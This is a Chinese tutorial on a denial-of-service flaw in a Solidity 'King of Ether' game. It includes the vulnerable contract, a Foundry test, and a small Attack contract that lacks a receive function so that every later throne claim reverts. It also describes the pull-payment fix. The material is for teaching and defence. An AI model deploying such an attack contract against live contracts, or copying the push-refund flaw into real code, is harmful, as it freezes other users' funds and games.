区块链安全常见的攻击分析——拒绝服务攻击 (Denial of Service-DOS)King合约【11】

区块链安全常见的攻击分析------拒绝服务攻击 Denial of Service

• • [1.1 漏洞分析](#1.1 漏洞分析)
  • [1.2 漏洞合约](#1.2 漏洞合约)
  • [1.3 攻击步骤分析](#1.3 攻击步骤分析)
  • • 解决方法
  • [1.4 攻击合约](#1.4 攻击合约)

合约内容 ：在合约游戏中，新玩家通过发送比当前 King 更多的代币来成为新的 King，同时合约会将原 King 的代币退回。
重点 ：
如果原 King 是一个合约地址，并且合约没有实现 receive 或 fallback 函数来接收代币，退回代币的 call 操作会失败，从而导致整个合约无法继续运行，游戏中断。

1.1 漏洞分析

会把上一个king转进来的钱退回，如果上一个king接收退回的函数有问题，就会导致合约游戏终止。

1.2 漏洞合约

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.18;

import "forge-std/Test.sol";

/*
名称：拒绝服务攻击 (Denial of Service)

描述：
KingOfEther 合约设计了一场游戏，用户可以通过发送比当前余额更多的以太币来获得"王位"。
合约会尝试将当前余额返还给上一个"国王"，当新用户发送更多的以太币时。
然而，这种机制可能被利用。攻击者的合约（这里是 Attack 合约）可以成为"国王"，
然后在其回退函数中触发回退失败或者消耗超过规定的 Gas 限制，
导致当 KingOfEther 合约试图将以太币返还给上一个国王时，claimThrone 函数失败。

缓解措施：
使用 Pull payment 模式，解决方法是让用户自己提取他们的以太币，而不是直接将以太币发送给他们。

参考：
https://slowmist.medium.com/intro-to-smart-contract-security-audit-dos-e23e9e901e26
*/

contract KingOfEther {
    address public king;
    uint public balance;

    function claimThrone() external payable {
        require(msg.value > balance, "Need to pay more to become the king");

        (bool sent, ) = king.call{value: balance}("");
        require(sent, "Failed to send Ether");

        balance = msg.value;
        king = msg.sender;
    }
}

1.3 攻击步骤分析

1. 在攻击合约中调用 claimThrone 函数，成为当前 King。故意不实现 receive 或 fallback 函数，确保攻击合约无法接收退回的代币。
   

2. 当下一个玩家（如 Aquarius）尝试通过调用 claimThrone 函数成为新的 King 时，合约会尝试将代币退回给攻击合约。
   
   

3. 由于攻击合约无法接收代币，退回操作失败，导致交易回滚，Aquarius 的竞争失败。合约陷入死锁状态，游戏无法继续进行。
   

解决方法

如果攻击合约有receive接收函数，用户Aquarius会竞选成功

结果输出：

1.4 攻击合约

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.18;

import "forge-std/Test.sol";
import "./DOS.sol";

contract ContractTest is Test {
    KingOfEther KingOfEtherContract;
    Attack attackContract;
    address Koko;
    address Aquarius;

    function setUp() public {
        KingOfEtherContract = new KingOfEther();
        attackContract = new Attack();
        Koko = vm.addr(1);
        Aquarius = vm.addr(2);
        vm.deal(address(Koko), 1 ether);
        vm.deal(address(Aquarius), 9 ether);
        vm.deal(address(attackContract), 6 ether);
        console.log("address(Koko):", address(Koko));
        console.log("address(Aquarius):", address(Aquarius));
        console.log("address(attackContract):", address(attackContract));
    }

    function testKingOfEther() public {
        console.log(
            "KingOfEther Contract king:",
            KingOfEtherContract.king(),
            "balance:",
            KingOfEtherContract.balance()
        );

        vm.prank(Koko); //  Koko 调函数，竞争king
        console.log("koko claim king");
        KingOfEtherContract.claimThrone{value: 1 ether}(); // 附带 1 ether 调用 claimThrone 函数
        console.log(
            "KingOfEther Contract king:",
            KingOfEtherContract.king(),
            "balance:",
            KingOfEtherContract.balance()
        );

        // 攻击
        console.log("ATTACK claim king..");
        attackContract.attack{value: 6 ether}(address(KingOfEtherContract));
        console.log(
            "KingOfEther Contract king:",
            KingOfEtherContract.king(),
            "balance:",
            KingOfEtherContract.balance()
        );

        vm.prank(Aquarius); // Aquarius 竞争king
        console.log("Aquarius claim king");
        vm.expectRevert("Failed to send Ether");
        KingOfEtherContract.claimThrone{value: 9 ether}(); // 附带 9 ether 调用 claimThrone 函数
        console.log("Aquarius FAIL !!");
        console.log(
            "KingOfEther Contract king:",
            KingOfEtherContract.king(),
            "balance:",
            KingOfEtherContract.balance()
        );
    }
}

contract Attack {
    address kingOfEtherAddress;

    function attack(address _kingOfEtherAddress) public payable {
        kingOfEtherAddress = _kingOfEtherAddress;
        KingOfEther(kingOfEtherAddress).claimThrone{value: msg.value}();
    }
}